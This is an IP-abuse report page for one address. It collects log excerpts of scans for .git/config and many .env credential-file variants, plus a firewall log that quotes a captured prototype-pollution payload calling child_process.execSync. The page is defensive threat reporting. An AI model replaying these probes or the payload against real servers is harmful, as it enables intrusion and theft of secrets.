This IP address has been reported a total of
35
times from
25 distinct
sources.
34.154.22.168 was first reported on
, and the most recent report was
.
Recent Reports:
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
Reporter
IoA Timestamp (UTC)
Comment
Categories
Anonymous
34.154.22.168 - - [01/Sep/2026:09:58:45 +0200] "GET /.git/config HTTP/1.1" 404 440 "-" "Mozilla/5.0 ...
show more34.154.22.168 - - [01/Sep/2026:09:58:45 +0200] "GET /.git/config HTTP/1.1" 404 440 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.154.22.168 - - [01/Sep/2026:09:58:45 +0200] "GET /.git/config HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.154.22.168 - - [01/Sep/2026:09:58:46 +0200] "GET /.env HTTP/1.1" 404 440 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.154.22.168 - - [01/Sep/2026:09:58:46 +0200] "GET /.env HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.154.22.168 - - [01/Sep/2026:09:58:46 +0200] "GET /.env.local HTTP/1.1" 404 440 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
34.154.22.168 - - [01/Sep/2026:09:58:46 +0200] "GET /.env.lo
...
show less
Bad Web Bot
Web App Attack
Anonymous
Bot / scanning and/or hacking attempts: GET /.env.ci HTTP/1.1, GET /.env1 HTTP/1.1, GET /.env.txt HT ...
show moreBot / scanning and/or hacking attempts: GET /.env.ci HTTP/1.1, GET /.env1 HTTP/1.1, GET /.env.txt HTTP/1.1, GET /.env.backup HTTP/1.1, GET /.env.save HTTP/1.1, GET /.env.live HTTP/1.1, GET /.env.example HTTP/1.1, GET /.env.swp HTTP/1.1, GET /.env.uat HTTP/1.1, GET /.env.stage HTTP/1.1, GET /.env.dist HTTP/1.1, POST / HTTP/1.1, GET /.env_copy HTTP/1.1, GET /.env~ HTTP/1.1, GET /.env.prod HTTP/1.1, GET /.env.docker HTTP/1.1, GET /.env.json HTTP/1.1, GET /.env.yaml HTTP/1.1, GET /.env2 HTTP/1.1, GET /.env.bak HTTP/1.1, GET /.env.preprod HTTP/1.1, GET /.env.dev HTTP/1.1
show less
(mod_security) mod_security triggered on hostname [redacted] 34.154.22.168 (IT/Italy/168.22.154.34.b ...
show more(mod_security) mod_security triggered on hostname [redacted] 34.154.22.168 (IT/Italy/168.22.154.34.bc.googleusercontent.com)
show less
[01/Sep/2026:05:54:46 +0300] -- 34.154.22.168 Ban reason: Scanner [CMS_GENERIC] | Request: GET /.git ...
show more[01/Sep/2026:05:54:46 +0300] -- 34.154.22.168 Ban reason: Scanner [CMS_GENERIC] | Request: GET /.git/config HTTP/1.1
show less
[TueSep0103:05:10.7796322026][security2:error][pid3461021:tid3461083][client34.154.22.168:0]ModSecur ...
show more[TueSep0103:05:10.7796322026][security2:error][pid3461021:tid3461083][client34.154.22.168:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"artisteer-italia.org\"][uri\"/\"][unique_id\"apYkxqeVAMiiYRdjrZ9f3gAAAIE\"]
show less